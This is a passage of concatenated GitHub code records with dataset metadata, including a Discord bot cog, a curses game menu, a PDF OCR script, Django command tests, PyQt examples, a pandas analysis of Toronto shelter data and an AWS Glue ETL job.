\\\r\n\t\t\t\t+ urllib.parse.urlencode({\"url\": url_long})\r\n\t\t\tres = requests.get(url)\r\n\t\t\treturn res.text\r\n\t\texcept Exception as e:\r\n\t\t\traise\r\n\r\n\t@commands.command()\r\n\tasync def lmgfy(self, ctx, *, search:str = None):\t\r\n\t\tif search:\r\n\t\t\ttry:\r\n\t\t\t\ts = self.shorten(f\"https://lmgtfy.com/?q={'+'.join(search.split())}\")\r\n\t\t\t\tif not ctx.message.author.top_role.colour:\r\n\t\t\t\t\tcol = 0xda3c3c\r\n\t\t\t\telse:\r\n\t\t\t\t\tcol = ctx.message.author.top_role.colour\r\n\r\n\t\t\t\tembed=discord.Embed(title=s, color=col)\r\n\t\t\t\tawait ctx.send(embed=embed)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\ttraceback.print_exc()\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(Lmgtfy(bot))","repo_name":"ScoobyChan/ScrappyBot","sub_path":"Cogs/Lmgtfy.py","file_name":"Lmgtfy.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23356810985","text":"import time\r\nimport curses\r\nimport time\r\nimport sys\r\n\r\ndef intro():\r\n print (\"Dust. A planet of sand and ruin. A desert planet.\\n\" \r\n \"It is the most important planet in the Third Imperium,\\n\" \r\n \"For the sands of Dust are like nothing else in the universe.\\n\"\r\n \"You are the new Duke of Dust,\" \r\n \"entrusted by the Emperor to govern the as yet\\n\" \r\n \"ungovernable world and rule in his name.\\n\"\r\n \"What ambitions might you have?\")\r\n\r\nintro()\r\n\r\ndef menu(root, current_row):\r\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\n height, width = root.getmaxyx()\r\n \r\n menu = [ \"Household\", \"Council\", \"Diplomacy\", \"Warfare\", \"Intrigue\", \"Economy\"]\r\n \r\n for idx, element in enumerate(menu):\r\n y = height // 2 + idx\r\n x = width // 2 - len(element) // 2 \r\n\r\n if idx == current_row:\r\n root.attron(curses.color_pair(1))\r\n root.addstr(y, x, element)\r\n root.attroff(curses.color_pair(1))\r\n\r\n else:\r\n root.addstr(y, x, element)\r\n\r\n root.refresh()\r\n# time.sleep(5)\r\n\r\ndef main(root):\r\n curses.curs_set(0)\r\n\r\n current_row = 0\r\n\r\n menu(root, current_row)\r\n\r\n while True:\r\n key = root.getch()\r\n\r\n if key == curses.KEY_UP and current_row > 0:\r\n current_row -= 1 \r\n \r\n elif key == curses.KEY_DOWN and current_row < 5:\r\n current_row += 1\r\n\r\n elif key == ord(\"e\"):\r\n root.refresh()\r\n root.addstr(0, 0, \"The Letter E\")\r\n \r\n elif key == ord(\"q\"):\r\n break\r\n\r\n menu(root, current_row)\r\n\r\n root.refresh()\r\n\r\n\r\ncurses.wrapper(main)\r\n\r\n \r\n","repo_name":"devindoherty/dust","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26648999766","text":"from pdf2image import convert_from_path\nfrom PIL import Image\nimport pytesseract\nimport pathlib\nimport os\nimport argparse\n\nfrom pdf2image.exceptions import (\n PDFInfoNotInstalledError,\n PDFPageCountError,\n PDFSyntaxError,\n)\n\n\ndef main():\n # use argparse to get input & output paths\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", type=str)\n\n args = parser.parse_args()\n\n # loop through files with glob */**.pdf ...find syntax\n\n # impliment error handling\n temp_folder = \"img/temp/\"\n\n if args.input:\n images = convert_from_path(\n args.input,\n output_folder=temp_folder,\n )\n\n infile_name = args.input.split(\"/\")\n outfile_name = 
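# --- Note on the Lmgtfy record above (hedged sketch, not the original code) ---
# Its shorten() method calls urllib.parse.urlencode() and requests.get(), but the
# file only imports discord/commands/traceback, so the command would raise
# NameError at runtime. A self-contained version of the same TinyURL call:
import urllib.parse

import requests

TINYURL_API = "http://tinyurl.com/api-create.php"

def shorten(url_long):
    # the api-create endpoint answers with the shortened URL as plain text
    url = TINYURL_API + "?" + urllib.parse.urlencode({"url": url_long})
    res = requests.get(url, timeout=10)
    res.raise_for_status()
    return res.text

# usage, mirroring the lmgfy command:
# shorten("https://lmgtfy.com/?q=" + "+".join("missing imports".split()))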
infile_name[-1].split(\".\")[0]\n\n # options:\n # convert_from_path(pdf_path, dpi=200, output_folder=None, first_page=None, last_page=None, fmt='ppm', jpegopt=None, thread_count=1, userpw=None, use_cropbox=False, strict=False, transparent=False, single_file=False, output_file=str(uuid.uuid4()), poppler_path=None, grayscale=False, size=None, paths_only=False, use_pdftocairo=False, timeout=600, hide_attributes=False)\n\n # IS THIS BETTER?\n\n # with tempfile.TemporaryDirectory() as path:\n # images_from_path = convert_from_path(args.input, output_folder=path)\n # # Do something here\n\n ocrfile = pathlib.Path(f\"./ocr/{outfile_name}.txt\")\n\n # create progress bar with richtext library\n\n print(\"There are\", len(images), \"pages.\")\n\n # this will be the inner loop for each pdf in the folder\n for index, image in enumerate(images):\n print(f\"Extracting text from page {index+1}...\")\n text = pytesseract.image_to_string(image) # time consuming part\n\n with open(ocrfile, \"a\") as outfile:\n outfile.write(text)\n outfile.write(f\"\\n END PAGE {index+1}\\n\") # do i need this?\n print(f\"Page {index+1} appended to file.\")\n\n print(f\"deleting temporary files from {temp_folder}...\")\n for file in os.listdir(temp_folder):\n if os.path.isfile(f\"{temp_folder}/{file}\"):\n os.remove(f\"{temp_folder}/{file}\")\n\n print(\"Conversion complete :)\")\n\n # create loop for files in folder that are already images not pdfs\n\n # uninstall opencv-python and remove from requirements.txt? didn't seem to need it.\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kgilbert78/pdf-to-text","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74904178348","text":"# Python\nfrom __future__ import unicode_literals\n\n# Django\nfrom django.core.management import get_commands, load_command_class, BaseCommand, CommandError\n\n# Test App\nfrom . 
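# --- Hedged sketch answering the "IS THIS BETTER?" comment in the pdf-to-text
# record above: tempfile.TemporaryDirectory removes the manual cleanup loop over
# img/temp/, since the page images vanish with the context manager. The input
# path below is hypothetical.
import tempfile

import pytesseract
from pdf2image import convert_from_path

def pdf_to_text(pdf_path):
    pages = []
    with tempfile.TemporaryDirectory() as tmpdir:
        # images exist only inside this block; no os.remove() bookkeeping needed
        for image in convert_from_path(pdf_path, output_folder=tmpdir):
            pages.append(pytesseract.image_to_string(image))
    return "\n".join(pages)

# usage (hypothetical file): print(pdf_to_text("scan.pdf"))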
import trackcalls\n\n\ndef get_command_class(name):\n app_name = get_commands()[name]\n if isinstance(app_name, BaseCommand):\n instance = app_name\n else:\n instance = load_command_class(app_name, name)\n return type(instance)\n\n\ndef track_command_class(name):\n klass = get_command_class(name)\n klass.execute = trackcalls(klass.execute)\n assert not klass.execute.has_been_called\n\n\ndef get_command_called(name):\n klass = get_command_class(name)\n return getattr(klass.execute, 'has_been_called', None)\n\n\ndef test_site_update_default(command_runner, settings):\n # Run site update with built-in default options, verify only expected\n # commands have been called.\n track_command_class('check')\n track_command_class('migrate')\n track_command_class('collectstatic')\n track_command_class('flush')\n result = command_runner('site_update', interactive=False)\n assert result[0] is None\n assert get_command_called('check')\n assert get_command_called('migrate')\n assert get_command_called('collectstatic')\n assert not get_command_called('flush')\n\n\ndef test_site_update_list_groups(command_runner, settings):\n result = command_runner('site_update', list_groups=True, verbosity=1)\n assert result[0] is None\n assert '[default]' in result[1]\n assert 'migrate(' not in result[1]\n result = command_runner('site_update', list_groups=True, verbosity=2)\n assert result[0] is None\n assert '[default]' in result[1]\n assert 'migrate(' in result[1]\n\n\ndef test_site_update_custom_default_group(command_runner, settings):\n # Replace the default update commands via settings, then verify that the\n # updated list of 'default' commands was used.\n settings.SITE_UPDATE_COMMANDS = {\n 'default': [\n 'check',\n 'migrate',\n ('update_permissions', (), {}, 'django_extensions'),\n ('collectstatic', (), {'clear': True}, 'staticfiles'),\n ],\n }\n track_command_class('check')\n track_command_class('migrate')\n track_command_class('update_permissions')\n track_command_class('collectstatic')\n track_command_class('flush')\n result = command_runner('site_update', interactive=False)\n assert result[0] is None\n assert get_command_called('check')\n assert get_command_called('migrate')\n assert get_command_called('update_permissions')\n assert get_command_called('collectstatic')\n assert not get_command_called('flush')\n\n\ndef test_site_update_new_group(command_runner, settings):\n # Create a new group of update commands via settings, run site_update with\n # 'clean' subcommand and verify only the expected commands were called.\n settings.SITE_UPDATE_COMMANDS = {\n 'clean': [\n ('remove_stale_contenttypes', (), {}, 'contenttypes'),\n ('clearsessions', (), {}, 'sessions'),\n ],\n }\n track_command_class('check')\n track_command_class('migrate')\n track_command_class('collectstatic')\n track_command_class('remove_stale_contenttypes')\n track_command_class('clearsessions')\n result = command_runner('site_update', 'clean', interactive=False)\n assert result[0] is None\n assert not get_command_called('check')\n assert not get_command_called('migrate')\n assert not get_command_called('collectstatic')\n assert get_command_called('remove_stale_contenttypes')\n assert get_command_called('clearsessions')\n\n\ndef test_site_update_multiple_groups(command_runner, settings):\n # Define a new group of subcommands, which will be merged with default\n # settings to include the default group. 
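# --- Hedged sketch: trackcalls is imported from the test app and is not shown
# in this record. A minimal implementation consistent with how it is used above
# (wrapping BaseCommand.execute and exposing a has_been_called flag) could be:
import functools

def trackcalls(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        wrapper.has_been_called = True
        return func(*args, **kwargs)
    wrapper.has_been_called = False
    return wrapper

@trackcalls
def fake_execute():
    return None

assert not fake_execute.has_been_called
fake_execute()
assert fake_execute.has_been_called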
Run using 'default' and 'clean'\n    # subcommands, verify that all commands in both groups were called.\n    settings.SITE_UPDATE_COMMANDS = {\n        'clean': [\n            ('remove_stale_contenttypes', (), {}, 'contenttypes'),\n            ('clearsessions', (), {}, 'sessions'),\n        ],\n    }\n    track_command_class('check')\n    track_command_class('migrate')\n    track_command_class('collectstatic')\n    track_command_class('remove_stale_contenttypes')\n    track_command_class('clearsessions')\n    result = command_runner('site_update', 'default', 'clean', interactive=False)\n    assert result[0] is None\n    assert get_command_called('check')\n    assert get_command_called('migrate')\n    assert get_command_called('collectstatic')\n    assert get_command_called('remove_stale_contenttypes')\n    assert get_command_called('clearsessions')\n\n\ndef test_site_update_app_not_installed(command_runner, settings):\n    # Define a new group with a subcommand that only runs if the 'blah' app is\n    # installed. Run using 'blah' subcommand should still succeed since\n    # 'blahapp' is specified and not installed.\n    settings.SITE_UPDATE_COMMANDS = {\n        'blah': [\n            ('blah', (), {}, 'blahapp'),\n        ],\n    }\n    track_command_class('check')\n    result = command_runner('site_update', 'blah', interactive=False)\n    assert result[0] is None\n    assert not get_command_called('check')\n\n\ndef test_site_update_unknown_command(command_runner, settings):\n    # Define a new group with an invalid command, should fail since 'argh' is\n    # an unknown command.\n    settings.SITE_UPDATE_COMMANDS = {\n        'argh': [\n            'argh',\n        ],\n    }\n    result = command_runner('site_update', 'argh', interactive=False)\n    assert isinstance(result[0], CommandError)\n\n\ndef test_site_update_invalid_command_specs(command_runner, settings):\n    # Define groups with invalid command specifications; both should fail.\n    settings.SITE_UPDATE_COMMANDS = {\n        'wtf': [\n            (),\n        ],\n        'wtf2': [\n            None,\n        ],\n    }\n    result = command_runner('site_update', 'wtf', interactive=False)\n    assert isinstance(result[0], CommandError)\n    result = command_runner('site_update', 'wtf2', interactive=False)\n    assert isinstance(result[0], CommandError)\n\n\ndef test_site_update_unknown_group(command_runner, settings):\n    # Run with unknown subcommand (unknown group); should fail.\n    result = command_runner('site_update', 'hoohah', interactive=False)\n    assert isinstance(result[0], CommandError)\n","repo_name":"ninemoreminutes/django-site-utils","sub_path":"test_project/test_app/tests/test_site_update.py","file_name":"test_site_update.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"3133552391","text":"from PyQt5.QtWidgets import QWidget,QPushButton,QFileDialog,QLineEdit,QApplication\nimport sys\nclass Example(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.initUI()\n    def initUI(self):\n        self.setGeometry(300,300,500,500)\n        self.setWindowTitle('打开对话框!')\n        self.bt1=QPushButton('打开文件',self)\n        self.bt1.move(350,20)\n        self.bt1.clicked.connect(self.OpenFileDialog)\n        self.text=QLineEdit('路径',self)\n        self.text.setGeometry(80,50,150,30)\n        self.show()\n    def OpenFileDialog(self):\n        fname,ftype=QFileDialog.getOpenFileName(self,'打开文件','./')\n        if fname:\n            self.text.setText(fname)\nif __name__=='__main__':\n    app=QApplication(sys.argv)\n    ex=Example()\n    
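# --- Hedged note on the PyQt5 record above: QFileDialog.getOpenFileName returns
# a (path, selected_filter) tuple and ('', '') on cancel, so the path should be
# truth-tested directly; indexing the empty string (fname[0]) raises IndexError.
from PyQt5.QtWidgets import QFileDialog

def pick_file(parent):
    fname, _ftype = QFileDialog.getOpenFileName(parent, 'Open file', './')
    return fname or None   # empty string -> dialog was cancelled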
exit(app.exec_())\n","repo_name":"sherwinleehao/photools","sub_path":"Reference/getOpenFileName.py","file_name":"getOpenFileName.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16367451079","text":"from rest_framework import serializers, exceptions\n\nfrom .models import StaticItem\n\n\nclass StaticSerializer(serializers.ModelSerializer):\n cpc = serializers.DecimalField(max_digits=10, decimal_places=2, read_only=True)\n cpm = serializers.DecimalField(max_digits=10, decimal_places=2, read_only=True)\n\n class Meta:\n model = StaticItem\n fields = '__all__'\n\n def validate(self, attrs):\n if attrs.get('views', 0) <= 0:\n attrs['views'] = None\n if attrs.get('click', 0) <= 0:\n attrs['click'] = None\n if 'cost' in attrs and attrs['cost'] < 0:\n raise exceptions.ValidationError('cost must be positive')\n\n return attrs","repo_name":"Ra1ze505/BcraftStatistic","sub_path":"statistic/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70655733228","text":"from pathlib import Path\nimport sys\n\nfrom PyQt6.QtWidgets import QApplication, QWidget\nfrom PyQt6 import uic\n\nBASE_DIR = Path(__file__).parent\n\n\nclass MainWindow(QWidget):\n def __init__(self) -> None:\n super().__init__()\n ui_file = BASE_DIR / Path(\"ui/main.ui\")\n uic.loadUi(ui_file, self)\n\n\nif __name__ == \"__main__\":\n # Qt application setup\n app = QApplication(sys.argv)\n app.setStyle(\"Fusion\")\n win = MainWindow()\n win.show()\n sys.exit(app.exec())\n","repo_name":"timlau/PyQt6-Examples","sub_path":"ui_app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21038412970","text":"import numpy as np\n\nfrom bootcamp.exceptions import StopTraining\nfrom bootcamp.utils import compute_return\n\nclass Monitor(object):\n def __init__(self):\n self._returns = []\n\n def __call__(self, trainer, state):\n batch_returns = [compute_return(episode.rewards) for episode in state['batch']]\n self._returns += batch_returns\n relevant_returns = self._returns[-trainer.env.spec.trials:]\n average_return = np.mean(relevant_returns)\n if average_return > trainer.env.spec.reward_threshold:\n print('Solved after {} iterations'.format(state['iteration']))\n raise StopTraining\n","repo_name":"jasonkriss/bootcamp","sub_path":"bootcamp/callbacks/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6103702346","text":"import numpy as np\nfrom gensim import models\n\nimport settings\n\n\ndef read_embeddings(type_emb='glove', path_test=None):\n\tprint('\\n-----------------------------------------')\n\tprint('Loading embeddings ' + type_emb + '...')\n\tprint('-----------------------------------------')\n\n\tword2vec = {}\n\tif type_emb == 'word2vec':\n\t\tword2vec = models.KeyedVectors.load_word2vec_format(settings.dir_embeddings_word2vec, binary=True)\n\t\tprint(settings.dir_embeddings_word2vec)\n\telse:\n\t\tpath = settings.dir_embeddings_glove if type_emb == 'glove' else settings.path if path_test is None else path_test\n\t\tfor line in open(path):\n\t\t\tvalues = line.split()\n\t\t\tword2vec[str(values[0]).lower()] = np.asarray(values[1:], 
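# --- Hedged usage sketch for read_embeddings above: once vectors sit in a plain
# word -> ndarray dict, similarity queries are simple dot products. The words
# and 50-d random vectors here are placeholders for real GloVe rows.
import numpy as np

word2vec = {
    "good": np.random.default_rng(0).normal(size=50).astype("float32"),
    "great": np.random.default_rng(1).normal(size=50).astype("float32"),
}

def cosine(u, v):
    return float(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v)))

print(cosine(word2vec["good"], word2vec["great"]))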
dtype='float32')\n\t\tprint(path)\n\n\treturn word2vec\t\t\n\n\n\n","repo_name":"cmdelcr/senti-embeddings","sub_path":"util/util_common.py","file_name":"util_common.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33492190297","text":"\n'''\n.plot() has several optional parameters. Most notably, the kind parameter accepts eleven different string values and determines which kind of plot you’ll create:\n \"area\" is for area plots.\n \"bar\" is for vertical bar charts.\n \"barh\" is for horizontal bar charts.\n \"box\" is for box plots.\n \"hexbin\" is for hexbin plots.\n \"hist\" is for histograms.\n \"kde\" is for kernel density estimate charts.\n \"density\" is an alias for \"kde\".\n \"line\" is for line graphs.\n \"pie\" is for pie charts.\n \"scatter\" is for scatter plots.\n'''\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pyplot as plt\n#import altair as alt\n\n# import data\nshelters = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2020/2020-12-01/shelters.csv')\n\n# see summary of data\nshelters.info()\n\n# convert datetime column\nshelters['occupancy_date'] = pd.to_datetime(shelters['occupancy_date'])\nshelters['occupancy_year'] = shelters.occupancy_date.dt.year\nshelters['occupancy_month'] = shelters.occupancy_date.dt.month\n\n# line plot showing occupancy/capacity over time\nshelters.groupby('occupancy_date').mean()[['occupancy','capacity']].plot() # ,xlim=(0,20),ylim=(0,100)\n\n# mean occupancy/capacity by by sector\nshelters[shelters.occupancy_date=='2017-01-01'].groupby('sector').mean()[['occupancy','capacity']].plot(kind='bar')\nshelters[shelters.occupancy_date=='2019-12-31'].groupby('sector').mean()[['occupancy','capacity']].plot(kind='bar')\n\n# how num of org, shelters, facility, program have changed over time\nshelters.groupby('occupancy_date').nunique()[['organization_name','shelter_name','facility_name','program_name']].plot() # ,xlim=(0,20),ylim=(0,100)\n\n# seasonal - summer - j,j,a; fall - s,o,n; winter - d,j,f; spring - m,a,m\nseason_dict={6 : \"summer\", 7 :\"summer\", 8 : \"summer\",\n 9 : \"fall\", 10 :\"fall\", 11 : \"fall\",\n 12 : \"winter\", 1 :\"winter\", 2 : \"winter\",\n 3 : \"spring\", 4 :\"spring\", 5 : \"spring\",} \nshelters['season'] = shelters['occupancy_month'].map(season_dict) \nshelters.groupby('season').mean()[['occupancy','capacity']].plot()\n\n# Immigrant, Refugee and Extreme weather shelters\nshelters['Immigrant']=shelters.organization_name.str.contains('Immigrant')\nshelters['Refugee']=shelters.organization_name.str.contains('Refugee')\nshelters['Extreme']=shelters.program_name.str.contains('Extreme')\n# create new column using .apply and a function\ndef f(row):\n if row['Immigrant'] == True:\n val = 'Immigrant'\n elif row['Refugee'] == True:\n val = 'Refugee'\n elif row['Extreme'] == True:\n val = 'Extreme'\n else:\n val = 'Normal'\n return val\nshelters['type'] = shelters.apply(f, axis=1)\n\nshelters[shelters.occupancy_date=='2019-12-31'].groupby(['type'])\\\n .sum()[['occupancy','capacity']]\\\n .plot(y='occupancy', kind='pie',figsize=(12,7))\n #.plot(kind='pie', subplots=True)\n #df.set_index('x').plot()\n\n# putting it all together using matplotlib\n#plt.figure(figsize = (10,6))\nfig, ax = plt.subplots(2,3)\nfig.subplots_adjust(hspace=0.5)\nfig.suptitle('Analysis of Toronto Shelters Data', fontsize=26, color='blue')\nfig.text(0.75, 0.01, 'https://twitter.com/vivekparasharr', 
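# --- Hedged aside on the shelters record above: the row-wise .apply(f, axis=1)
# that derives the 'type' column can be written as a vectorized np.select, which
# keeps the same first-match-wins semantics as the if/elif chain:
import numpy as np
import pandas as pd

df = pd.DataFrame({
    "Immigrant": [True, False, False, False],
    "Refugee": [False, True, False, False],
    "Extreme": [False, False, True, False],
})
df["type"] = np.select(
    [df["Immigrant"], df["Refugee"], df["Extreme"]],
    ["Immigrant", "Refugee", "Extreme"],
    default="Normal",
)
print(df["type"].tolist())   # ['Immigrant', 'Refugee', 'Extreme', 'Normal']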
style = 'italic', fontsize = 10, color = \"blue\") \nshelters.groupby('occupancy_date').mean()[['occupancy','capacity']].plot(title='Capacity and Occupany over Time', ax=ax[0,0],figsize=(12,7)) # ,xlim=(0,20),ylim=(0,100)\nshelters.groupby('occupancy_date').nunique()[['organization_name','shelter_name','facility_name','program_name']].plot(title='# of Orgs, Shelters, Facilities, Programs', ax=ax[0,1],figsize=(12,7)) # ,xlim=(0,20),ylim=(0,100)\nshelters.groupby('season').mean()[['occupancy','capacity']].plot(title='Capacity and Occupancy over Time', ax=ax[0,2],figsize=(12,7))\nshelters[shelters.occupancy_date=='2017-01-01'].groupby('sector').mean()[['occupancy','capacity']].plot(title='2017: Cap/Ocp by Sector', kind='bar', ax=ax[1,0],figsize=(12,7))\nshelters[shelters.occupancy_date=='2019-12-31'].groupby('sector').mean()[['occupancy','capacity']].plot(title='2019: Cap/Ocp by Sector', kind='bar', ax=ax[1,1],figsize=(12,7))\nshelters[shelters.occupancy_date=='2019-12-31'].groupby(['type']).sum()[['occupancy','capacity']].plot(title='2019: Occupancy by Type', y='occupancy', kind='pie', ax=ax[1,2],figsize=(12,7))\nplt.savefig('/Users/vivekparashar/OneDrive/OneDrive-GitHub/Challenges-and-Competitions/TidyTuesday/Data/2020-12-01/20201201-Toronto-Shelters.png', dpi=300, facecolor='w')\nplt.show()\n\n'''\nfig.subplots_adjust(..)\nleft = 0.125 # the left side of the subplots of the figure\nright = 0.9 # the right side of the subplots of the figure\nbottom = 0.1 # the bottom of the subplots of the figure\ntop = 0.9 # the top of the subplots of the figure\nwspace = 0.2 # the amount of width reserved for blank space between subplots\nhspace = 0.2 # the amount of height reserved for white space between subplots\n'''\n","repo_name":"vivekparasharr/Challenges-and-Competitions","sub_path":"TidyTuesday/20201201-toronto-shelters.py","file_name":"20201201-toronto-shelters.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"29457919287","text":"import os\nimport tempfile\n\nimport pytest\nfrom app import create_app, register_blueprints\nfrom app.plugins import db, ma\n# flake8: noqa\nfrom app.repositories.models import Ingredient, Order, OrderDetail, Size\n\nfrom .fixtures.ingredient import (ingredient_mock, ingredient_uri,\n ingredient, ingredients,\n create_ingredient, create_ingredients)\nfrom .fixtures.order import (client_data_mock, order_uri, client_data,\n order, create_order, create_orders)\nfrom .fixtures.size import (size_mock, size_uri, size, sizes,\n create_size, create_sizes)\nfrom .fixtures.beverage import (beverage_mock, beverage_uri, beverage,\n beverages, create_beverage, create_beverages)\nfrom .fixtures.report import report_uri\n\n\n@pytest.fixture\ndef app():\n\n db_fd, dbpath = tempfile.mkstemp()\n\n class Config:\n SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(dbpath)\n TESTING = True\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n flask_app = create_app(Config)\n register_blueprints(flask_app)\n flask_app.app_context().push()\n db.init_app(flask_app)\n ma.init_app(flask_app)\n\n db.create_all()\n\n yield flask_app\n\n db.session.remove()\n db.drop_all()\n os.close(db_fd)\n os.remove(dbpath)\n\n\n@pytest.fixture\ndef client(app):\n client = app.test_client()\n return 
client\n","repo_name":"sbateca/python-pizza-planet-refactor","sub_path":"app/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17929472372","text":"import sys\nfrom awsglue.transforms import *\nfrom awsglue.utils import getResolvedOptions\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom awsglue.job import Job\n\nargs = getResolvedOptions(sys.argv, [\"JOB_NAME\"])\nsc = SparkContext()\nglueContext = GlueContext(sc)\nspark = glueContext.spark_session\njob = Job(glueContext)\njob.init(args[\"JOB_NAME\"], args)\n\n# Script generated for node accelerometer_trusted\naccelerometer_trusted_node1 = glueContext.create_dynamic_frame.from_options(\n format_options={\"multiline\": False},\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"paths\": [\"s3://renee-stedi-project-lakehouse/accelerometer_trusted/\"],\n \"recurse\": True,\n },\n transformation_ctx=\"accelerometer_trusted_node1\",\n)\n\n# Script generated for node step_trainer_landing\nstep_trainer_landing_node1684277885644 = glueContext.create_dynamic_frame.from_options(\n format_options={\"multiline\": False},\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"paths\": [\"s3://renee-stedi-project-lakehouse/step_trainer_landing/\"],\n \"recurse\": True,\n },\n transformation_ctx=\"step_trainer_landing_node1684277885644\",\n)\n\n# Script generated for node customer_trusted_data\ncustomer_trusted_data_node1684277965513 = glueContext.create_dynamic_frame.from_options(\n format_options={\"multiline\": False},\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"paths\": [\"s3://renee-stedi-project-lakehouse/customer_trusted_zone/\"],\n \"recurse\": True,\n },\n transformation_ctx=\"customer_trusted_data_node1684277965513\",\n)\n\n# Script generated for node JoinOnTimestamp\nJoinOnTimestamp_node1684278045681 = Join.apply(\n frame1=accelerometer_trusted_node1,\n frame2=step_trainer_landing_node1684277885644,\n keys1=[\"timeStamp\"],\n keys2=[\"sensorReadingTime\"],\n transformation_ctx=\"JoinOnTimestamp_node1684278045681\",\n)\n\n# Script generated for node JoinOnCustomer\nJoinOnCustomer_node1684278126915 = Join.apply(\n frame1=customer_trusted_data_node1684277965513,\n frame2=JoinOnTimestamp_node1684278045681,\n keys1=[\"email\"],\n keys2=[\"user\"],\n transformation_ctx=\"JoinOnCustomer_node1684278126915\",\n)\n\n# Script generated for node machine_learning_curated\nmachine_learning_curated_node3 = glueContext.write_dynamic_frame.from_options(\n frame=JoinOnCustomer_node1684278126915,\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"path\": \"s3://renee-stedi-project-lakehouse/machine_learning_curated/\",\n \"partitionKeys\": [],\n },\n transformation_ctx=\"machine_learning_curated_node3\",\n)\n\njob.commit()\n","repo_name":"WhiskersReneeWe/de-glue","sub_path":"machine_learning_curated.py","file_name":"machine_learning_curated.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18635637629","text":"import numpy as np\nimport columnplots as clp\nfrom scipy import signal\nimport os, sys, time\nimport math\nfrom itertools import islice\nfrom scipy import fftpack\nimport glob\nimport json\n\n\ndef obtain_avg_data(path, pattern=\"simu_*.vac.txt\"):\n filenames = glob.glob(\"%s/%s\" 
%(path, pattern))\n print(\"Averaging over %d trajectories\" %(len(filenames)))\n data = np.loadtxt(filenames[0])\n for filename in filenames[1:]:\n data += np.loadtxt(filename)\n data /= float(len(filenames))\n return data\n\ndef gather_IR_data(paths):\n freqs, sps = [], []\n for path in paths:\n data = obtain_avg_data(path=path, pattern=\"simu_*.dac.txt\")\n freq, sp = data[:,5], (data[:,6] + data[:,7])/2e28\n freqs.append(freq)\n sps.append(sp)\n return freqs, sps\n\ndef gather_relaxation_trajectory(paths, opposite=False):\n ts, trajs = [], []\n if opposite:\n pattern = \"simu_*.VCO_summed_td_oppo.txt\"\n else:\n pattern = \"simu_*.VCO_summed_td.txt\"\n for path in paths:\n data = obtain_avg_data(path=path, pattern=pattern)\n t, traj = data[1:,0], data[1:, 1]\n ts.append(t*1e-3) # fs to ps\n if opposite:\n trajs.append(traj / 206.0 - 0.000950037)\n else:\n trajs.append(traj / 10.0 - 0.000950037) # averaged over 10 molecules and minus 300K in a.u.\n return ts, trajs\n\ndef prepare_ph_data(path=\"pumping_Rabi/E0_2e-4_Exc_UP_Amp_6e-3\", omega=2320, pattern=\"simu_*.ph*\", dtfs=2):\n filenames = glob.glob(\"%s/%s\" %(path, pattern))\n N = len(filenames)\n print(\"reading %s with %d files\" %(path, N))\n size = np.size(np.loadtxt(filenames[0])[:,0])\n t, phx, phy = np.zeros(size), np.zeros(size), np.zeros(size)\n ph2au = 0.5 * 1.8897259885789**2 * omega**2 * 0.0000045563352812122295**2\n vph2au = 0.5 * 1.8897259885789**2 / 41.341374575751**2\n for filename in filenames:\n data = np.loadtxt(filename)\n t_loc, qx_loc, qy_loc = data[:,0], data[:,1], data[:,2]\n vx_loc = np.gradient(qx_loc, dtfs, axis=-1, edge_order=2)\n vy_loc = np.gradient(qy_loc, dtfs, axis=-1, edge_order=2)\n t += t_loc\n phx += qx_loc**2 * ph2au + vx_loc**2 * vph2au\n phy += qy_loc**2 * ph2au + vy_loc**2 * vph2au\n return t[1:-2]/N, (phx[1:-2] + phy[1:-2])/N\n\npaths_IR = [\"co2_eq/E0_0e-4/\", \"co2_eq/E0_2e-4/\"]\npaths_VR = [\"try_VER_abe/Exc_10_E0_0e-4/\", \"try_VER_abe/Exc_10_E0_2e-4/\"]\n\ndef plot_results():\n freqs, sps = 